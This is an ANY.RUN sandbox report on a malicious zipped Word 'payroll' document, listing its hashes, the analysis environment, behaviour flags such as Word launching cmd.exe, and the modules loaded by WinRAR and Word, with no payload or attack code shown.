369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51

Interactive malware hunting service

General Info

File name: payrol_23828328.doc.zip.zip

Full analysis: https://app.any.run/tasks/ca46e81b-25f8-48a9-b520-5b8ca42c2ab4

Verdict: Malicious activity

Analysis date: 12/2/2019, 19:18:28

OS:: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)

Tags:: encrypted

Indicators:

MIME:: application/zip

File info:: Zip archive data, at least v2.0 to extract

MD5: 6d8d39969d150062b80f6aaf72875f6e

SHA1: 39da65fd5e8d66daa14fbc21f8663e6585f8f4f8

SHA256: 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51

SSDEEP: 12288:OHZblWN06Nu87rFuTXTdaK4NHi1CkHuXpJgIT9Ybv+fWEyyJPV1it:YbcNu8ALTwK4Fi1CkCbgIhYbsPJN1K

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration: 300 seconds

Additional time used: 240 seconds

Fakenet option: off

Heavy Evaision option: off

MITM proxy: off

Route via Tor: off

Network geolocation: off

Privacy: Public submission

Autoconfirmation of UAC: on

Software preset

Internet Explorer 8.0.7601.17514
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Behavior activities

MALICIOUS	SUSPICIOUS	INFO
Unusual execution from Microsoft Office WINWORD.EXE (PID: 3936) Starts CMD.EXE for commands execution WINWORD.EXE (PID: 3936)	Executes application which crashes cmd.exe (PID: 2748) Executes scripts cmd.exe (PID: 2748)	Manual execution by user WinRAR.exe (PID: 1536) WINWORD.EXE (PID: 3936) Creates files in the user directory WINWORD.EXE (PID: 3936) Reads Microsoft Office registry keys WINWORD.EXE (PID: 3936)

MALICIOUS

SUSPICIOUS

INFO

Unusual execution from Microsoft Office

WINWORD.EXE (PID: 3936)

Starts CMD.EXE for commands execution

WINWORD.EXE (PID: 3936)

Executes application which crashes

cmd.exe (PID: 2748)

Executes scripts

cmd.exe (PID: 2748)

Manual execution by user

WinRAR.exe (PID: 1536)
WINWORD.EXE (PID: 3936)

Creates files in the user directory

WINWORD.EXE (PID: 3936)

Reads Microsoft Office registry keys

WINWORD.EXE (PID: 3936)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD

.zip

| ZIP compressed archive (100%)

EXIF

ZipRequiredVersion:

788

ZipBitFlag:

0x0001

ZipCompression:

None

ZipModifyDate:

2019:12:02 16:22:03

ZipCRC:

0x706cb62a

ZipCompressedSize:

561386

ZipUncompressedSize:

561386

ZipFileName:

payrol_23828328.doc.zip

Screenshots

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 17783 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 22795 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 30802 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 32803 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 34803 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 39809 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 44839 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 47870 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 49871 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 51873 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 52874 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 53884 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 57888 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 58889 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 60891 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 61894 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 64902 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 65914 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 66926 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 106209 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 107249 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 108256 ms from task started

Screenshot of 369cdca750ac6d1dd3d4ebdc1c955d86c942984c44aed78dff765a2c086daf51 taken from 109256 ms from task started

Processes

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

–

Specs description

Program did not start

Integrity level elevation

Task сontains an error or was rebooted

Process has crashed

Task contains several apps running

Executable file was dropped

Debug information is available

Process was injected

Network attacks were detected

Application downloaded the executable file

Actions similar to stealing personal data

Behavior similar to exploiting the vulnerability

Inspected object has sucpicious PE structure

File is detected by antivirus software

CPU overrun

RAM overrun

Process starts the services

Process was added to the startup

Behavior similar to spam

Low-level access to the HDD

Probably Tor was used

System was rebooted

Connects to the network

Known threat

Process information

Click at the process to see the details.

PID: 332

CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\payrol_23828328.doc.zip.zip"

Path: C:\Program Files\WinRAR\WinRAR.exe

Indicators: No indicators

Parent process: ––

User: admin

Integrity Level: MEDIUM

Exit code: 0

Version:

Company: Alexander Roshal

Description: WinRAR archiver

Version: 5.60.0

Modules

Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\networkexplorer.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID: 1536

CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\payrol_23828328.doc.zip"

Path: C:\Program Files\WinRAR\WinRAR.exe

Indicators: No indicators

Parent process: ––

User: admin

Integrity Level: MEDIUM

Exit code: 0

Version:

Company: Alexander Roshal

Description: WinRAR archiver

Version: 5.60.0

Modules

Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\installer\{90140000-003d-0000-0000-0000000ff1ce}\wordicon.exe
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID: 3936

CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\payrol_23828328.doc"

Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Indicators: No indicators

Parent process: ––

User: admin

Integrity Level: MEDIUM

Version:

Company: Microsoft Corporation

Description: Microsoft Word

Version: 14.0.6024.1000

Modules

Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sxs.dll
c:\progra~1\micros~1\office14\genko.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\fm20.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\fm20enu.dll
c:\windows\system32\asycfilt.dll
c:\windows\system32\scrrun.dll
